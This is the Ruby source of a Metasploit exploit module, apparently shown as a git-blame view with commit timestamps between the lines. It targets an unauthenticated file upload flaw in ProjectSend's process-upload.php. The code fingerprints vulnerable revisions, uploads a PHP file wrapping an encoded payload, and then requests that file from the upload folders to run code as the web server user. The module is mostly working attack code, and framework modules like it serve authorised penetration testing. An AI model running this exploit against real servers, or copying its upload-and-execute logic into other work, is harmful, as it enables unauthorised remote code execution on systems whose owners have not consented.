2014-12-23 10:53:03 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2014-12-23 10:53:03 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2014-12-23 10:53:03 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'ProjectSend Arbitrary File Upload',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a file upload vulnerability in ProjectSend
|
|
|
|
revisions 100 to 561. The 'process-upload.php' file allows
|
|
|
|
unauthenticated users to upload PHP files resulting in remote
|
|
|
|
code execution as the web server user.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Fady Mohammed Osman', # Discovery and Exploit
|
2019-01-10 19:19:14 +00:00
|
|
|
'bcoles' # Metasploit
|
2014-12-23 10:53:03 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['EDB', '35424']
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
},
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
|
|
|
|
['ProjectSend (PHP Payload)', {}]
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => 'Dec 02 2014',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2014-12-23 10:53:03 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Checks if target upload functionality is working
|
|
|
|
#
|
|
|
|
def check
|
|
|
|
res = send_request_cgi(
|
|
|
|
'uri' => normalize_uri(target_uri.path, 'process-upload.php')
|
|
|
|
)
|
|
|
|
if !res
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Connection timed out")
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
elsif res.code.to_i == 404
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("No process-upload.php found")
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
elsif res.code.to_i == 500
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Unable to write file")
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("File process-upload.php is not executable")
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Software is misconfigured")
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
|
2014-12-23 10:53:03 +00:00
|
|
|
# response on revision 118 onwards includes the file name
|
2014-12-26 17:24:02 +00:00
|
|
|
if res.body && res.body =~ /NewFileName/
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
# response on revisions 100 to 117 does not include the file name
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.body && res.body =~ /Failed to open output stream/
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Upload folder is not writable")
|
2014-12-23 10:53:03 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Upload PHP payload
|
|
|
|
#
|
|
|
|
def upload
|
|
|
|
fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
|
|
|
|
php = "<?php #{payload.encoded} ?>"
|
|
|
|
data = Rex::MIME::Message.new
|
|
|
|
data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
|
|
|
|
post_data = data.to_s
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Uploading file '#{fname}' (#{php.length} bytes)")
|
2014-12-23 10:53:03 +00:00
|
|
|
res = send_request_cgi(
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
|
|
|
|
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
|
|
|
'data' => post_data
|
|
|
|
)
|
|
|
|
if !res
|
|
|
|
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
|
|
|
|
elsif res.code.to_i == 404
|
|
|
|
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
|
|
|
|
elsif res.code.to_i == 500
|
|
|
|
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
|
2014-12-23 10:53:03 +00:00
|
|
|
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
|
2014-12-23 10:53:03 +00:00
|
|
|
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
|
2014-12-23 10:53:03 +00:00
|
|
|
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
|
|
|
|
# response on revision 118 onwards includes the file name
|
2014-12-26 17:24:02 +00:00
|
|
|
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
|
2016-02-01 21:12:03 +00:00
|
|
|
print_good("Payload uploaded successfully (#{fname})")
|
2014-12-23 10:53:03 +00:00
|
|
|
return fname
|
|
|
|
# response on revisions 100 to 117 does not include the file name
|
|
|
|
elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
|
2016-02-01 21:12:03 +00:00
|
|
|
print_warning("File upload may have failed")
|
2014-12-23 10:53:03 +00:00
|
|
|
return fname
|
|
|
|
else
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_status("Received response: #{res.code} - #{res.body}")
|
2014-12-23 10:53:03 +00:00
|
|
|
fail_with(Failure::Unknown, "#{peer} - Something went wrong")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Execute uploaded file
|
|
|
|
#
|
|
|
|
def exec(upload_path)
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Executing #{upload_path}...")
|
2014-12-23 10:53:03 +00:00
|
|
|
res = send_request_raw(
|
2014-12-26 17:24:02 +00:00
|
|
|
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
|
2014-12-23 10:53:03 +00:00
|
|
|
)
|
|
|
|
if !res
|
2016-02-01 21:12:03 +00:00
|
|
|
print_status("Request timed out while executing")
|
2014-12-23 10:53:03 +00:00
|
|
|
elsif res.code.to_i == 404
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_error("Not found: #{upload_path}")
|
2014-12-23 10:53:03 +00:00
|
|
|
elsif res.code.to_i == 200
|
2016-02-01 21:12:03 +00:00
|
|
|
vprint_good("Executed #{upload_path}")
|
2014-12-23 10:53:03 +00:00
|
|
|
else
|
2016-02-01 21:12:03 +00:00
|
|
|
print_error("Unexpected reply")
|
2014-12-23 10:53:03 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# upload && execute
|
|
|
|
#
|
|
|
|
def exploit
|
|
|
|
fname = upload
|
|
|
|
register_files_for_cleanup(fname)
|
|
|
|
exec("upload/files/#{fname}") # default for r-221 onwards
|
2014-12-26 17:24:02 +00:00
|
|
|
unless session_created?
|
|
|
|
exec("upload/temp/#{fname}") # default for r-100 to r-219
|
|
|
|
end
|
2014-12-23 10:53:03 +00:00
|
|
|
end
|
|
|
|
end
|